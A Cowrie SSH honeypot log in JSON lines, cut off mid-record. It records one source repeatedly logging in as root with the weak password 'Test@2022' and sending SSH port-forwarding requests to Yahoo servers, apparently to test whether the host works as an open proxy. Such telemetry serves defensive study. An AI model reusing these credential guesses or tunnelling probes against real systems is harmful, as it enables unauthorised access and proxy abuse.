{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.172921Z","src_ip":"213.209.150.239","session":"4cf0c9c2af98"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.221459Z","src_ip":"213.209.150.239","session":"4cf0c9c2af98"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49760,"dst_ip":"1.2.3.4","dst_port":22,"session":"d899409e4cd3","protocol":"ssh","message":"New connection: 213.209.150.239:49760 (1.2.3.4:22) [session: d899409e4cd3]","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.267671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.268426Z","src_ip":"213.209.150.239","session":"d899409e4cd3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.315776Z","src_ip":"213.209.150.239","session":"d899409e4cd3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.550977Z","src_ip":"213.209.150.239","session":"d899409e4cd3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":23971,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:23971","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.599147Z","session":"d899409e4cd3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.646327Z","src_ip":"213.209.150.239","session":"d899409e4cd3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":27960,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:27960","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.781568Z","session":"d899409e4cd3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.828894Z","src_ip":"213.209.150.239","session":"d899409e4cd3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.876790Z","src_ip":"213.209.150.239","session":"d899409e4cd3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49784,"dst_ip":"1.2.3.4","dst_port":22,"session":"d754e8260f56","protocol":"ssh","message":"New connection: 213.209.150.239:49784 (1.2.3.4:22) [session: d754e8260f56]","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.923315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.924298Z","src_ip":"213.209.150.239","session":"d754e8260f56"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.971305Z","src_ip":"213.209.150.239","session":"d754e8260f56"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:49.205984Z","src_ip":"213.209.150.239","session":"d754e8260f56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":15634,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:15634","sensor":"my-vps","timestamp":"2025-08-26T00:54:49.254741Z","session":"d754e8260f56"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:49.302122Z","src_ip":"213.209.150.239","session":"d754e8260f56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":14592,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14592","sensor":"my-vps","timestamp":"2025-08-26T00:54:49.437582Z","session":"d754e8260f56"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:49.484910Z","src_ip":"213.209.150.239","session":"d754e8260f56"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:49.533277Z","src_ip":"213.209.150.239","session":"d754e8260f56"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49825,"dst_ip":"1.2.3.4","dst_port":22,"session":"175ccfe41563","protocol":"ssh","message":"New connection: 213.209.150.239:49825 (1.2.3.4:22) [session: 175ccfe41563]","sensor":"my-vps","timestamp":"2025-08-26T00:54:49.579005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:49.579931Z","src_ip":"213.209.150.239","session":"175ccfe41563"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:49.626853Z","src_ip":"213.209.150.239","session":"175ccfe41563"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:49.862381Z","src_ip":"213.209.150.239","session":"175ccfe41563"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":23601,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:23601","sensor":"my-vps","timestamp":"2025-08-26T00:54:49.910348Z","session":"175ccfe41563"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:49.957532Z","src_ip":"213.209.150.239","session":"175ccfe41563"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":21476,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:21476","sensor":"my-vps","timestamp":"2025-08-26T00:54:50.093557Z","session":"175ccfe41563"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:50.141041Z","src_ip":"213.209.150.239","session":"175ccfe41563"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:50.189052Z","src_ip":"213.209.150.239","session":"175ccfe41563"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49855,"dst_ip":"1.2.3.4","dst_port":22,"session":"7acc98e935f1","protocol":"ssh","message":"New connection: 213.209.150.239:49855 (1.2.3.4:22) [session: 7acc98e935f1]","sensor":"my-vps","timestamp":"2025-08-26T00:54:50.244837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:50.245607Z","src_ip":"213.209.150.239","session":"7acc98e935f1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:50.302300Z","src_ip":"213.209.150.239","session":"7acc98e935f1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:50.584685Z","src_ip":"213.209.150.239","session":"7acc98e935f1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":29832,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:29832","sensor":"my-vps","timestamp":"2025-08-26T00:54:50.642195Z","session":"7acc98e935f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:50.699006Z","src_ip":"213.209.150.239","session":"7acc98e935f1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":31955,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:31955","sensor":"my-vps","timestamp":"2025-08-26T00:54:50.855075Z","session":"7acc98e935f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:50.911811Z","src_ip":"213.209.150.239","session":"7acc98e935f1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:50.969286Z","src_ip":"213.209.150.239","session":"7acc98e935f1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49902,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3dc6a0ea524","protocol":"ssh","message":"New connection: 213.209.150.239:49902 (1.2.3.4:22) [session: d3dc6a0ea524]","sensor":"my-vps","timestamp":"2025-08-26T00:54:51.024908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:51.025943Z","src_ip":"213.209.150.239","session":"d3dc6a0ea524"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:51.082472Z","src_ip":"213.209.150.239","session":"d3dc6a0ea524"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:51.364611Z","src_ip":"213.209.150.239","session":"d3dc6a0ea524"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":16026,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:16026","sensor":"my-vps","timestamp":"2025-08-26T00:54:51.421952Z","session":"d3dc6a0ea524"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:51.478821Z","src_ip":"213.209.150.239","session":"d3dc6a0ea524"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":17269,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:17269","sensor":"my-vps","timestamp":"2025-08-26T00:54:51.635096Z","session":"d3dc6a0ea524"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:51.692597Z","src_ip":"213.209.150.239","session":"d3dc6a0ea524"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:51.749976Z","src_ip":"213.209.150.239","session":"d3dc6a0ea524"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49944,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfede42c9cb1","protocol":"ssh","message":"New connection: 213.209.150.239:49944 (1.2.3.4:22) [session: dfede42c9cb1]","sensor":"my-vps","timestamp":"2025-08-26T00:54:51.805637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:51.806291Z","src_ip":"213.209.150.239","session":"dfede42c9cb1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-s